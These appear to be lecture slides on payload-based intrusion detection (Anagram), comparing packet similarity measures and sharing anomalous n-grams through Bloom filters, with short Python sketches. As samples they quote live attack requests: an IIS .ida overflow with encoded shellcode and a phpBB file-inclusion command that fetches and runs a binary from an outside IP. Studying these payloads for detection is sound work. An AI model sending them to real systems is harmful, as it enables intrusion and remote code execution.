 Most of the techniques are similar, except LCS (vulnerable to slight differences)
 ED and LCSeq are very similar
 N-gram techniques not included (they don’t compute similarity over the entire packet datagram)
To compare the differences more precisely, normalize and compare scores:
 Compute similarity score vectors V_A, V_B
 Match their medians
 Scale ranges proportionally so the min and max values match
 Manhattan distance is then computed between the vectors
 Each privacy-enabled technique is compared against Raw-LCSeq (baseline)
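A sketch of this comparison; the unit-range scaling and per-pair averaging below are illustrative choices, as the slide does not fix the exact scaling:

```python
import statistics

def normalize(v):
    """Shift so the median is 0, then scale so the range is 1."""
    med = statistics.median(v)
    shifted = [x - med for x in v]
    rng = max(shifted) - min(shifted)
    return shifted if rng == 0 else [x / rng for x in shifted]

def score_vector_distance(va, vb):
    """Average Manhattan distance between two normalized score
    vectors, e.g. a privacy-enabled technique vs. the Raw-LCSeq
    baseline over the same set of packet pairs."""
    a, b = normalize(va), normalize(vb)
    return sum(abs(x - y) for x, y in zip(a, b)) / len(a)
```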
88
Similarity of packets (III)

Type | Raw-LCS | Raw-ED |  MD   | ZStr-LCS | ZStr-LCSeq | ZStr-ED
G-G  |  .0948  | .0336  | .0669 |  .2079   |   .0794    |  .0667
B-B  |  .0508  | .0441  | .0653 |  .0399   |   .0263    |  .0669
G-B  |  .0251  | .0241  | .0110 |  .0310   |   .0191    |  .0233
 Unsurprisingly, Raw-ED is closest to Raw-LCSeq
 All privacy-preserving methods are close when correlating pairs that include attack traffic; they may be leveraging the difference between byte distributions

Manhattan distance between packet frequency distributions:
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\x0d\n.
GET /notarealfile.idq?UOIRJVFJWPOIVNBUNIVUWIFOJIVNNZCIVIVIGJBMOMKRNVEWIFUVNVGFWERIOUNVUNWIUNFOWIFGITTOOWENVJSNVSFDVIRJGOGTNGTOWGTFGPGLKJFGOIRWTPOIREPTOEIGPOEWKFVVNKFVVSDNVFDSFNKVFKGTRPOPOGOPIRWOIRNNMSKVFPOSVODIOREOITIGTNJGTBNVNFDFKLVSPOERFROGDFGKDFGGOTDNKPRJNJIDH%u1234DSPPOITEBFBWEJFBHREWJFHFRG=bla HTTP/1.0\x0d\n.
 The anomalous n-grams of a suspicious payload are stored in a Bloom filter and exchanged among sites
 By checking the n-grams of local alerts against the Bloom-filter alert, it is easy to tell how similar the alerts are to each other
  The common malicious n-grams can be used for general signature generation, even for polymorphic worms
 Privacy-preserving, with no loss of accuracy
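A sketch of the cross-site check; `remote_bf` stands for the Bloom-filter alert received from another site, and only needs a `verify(ngram) -> bool` method:

```python
def alert_similarity(local_ngrams, remote_bf):
    """Fraction of a local alert's anomalous n-grams that are
    present in a remote site's Bloom-filter alert. Raw n-grams
    are never exchanged -- only the bit vector is, so the check
    is privacy-preserving."""
    if not local_ngrams:
        return 0.0
    hits = sum(1 for g in local_ngrams if remote_bf.verify(g))
    return hits / len(local_ngrams)
```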
 Anagram not only detects suspicious packets, it also identifies the corresponding malicious n-grams!
 These n-grams are good targets for further analysis and signature generation
 The set of n-grams is order-independent, so attack-vector reordering will fail.
92
Anagram flattened signature for attack
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..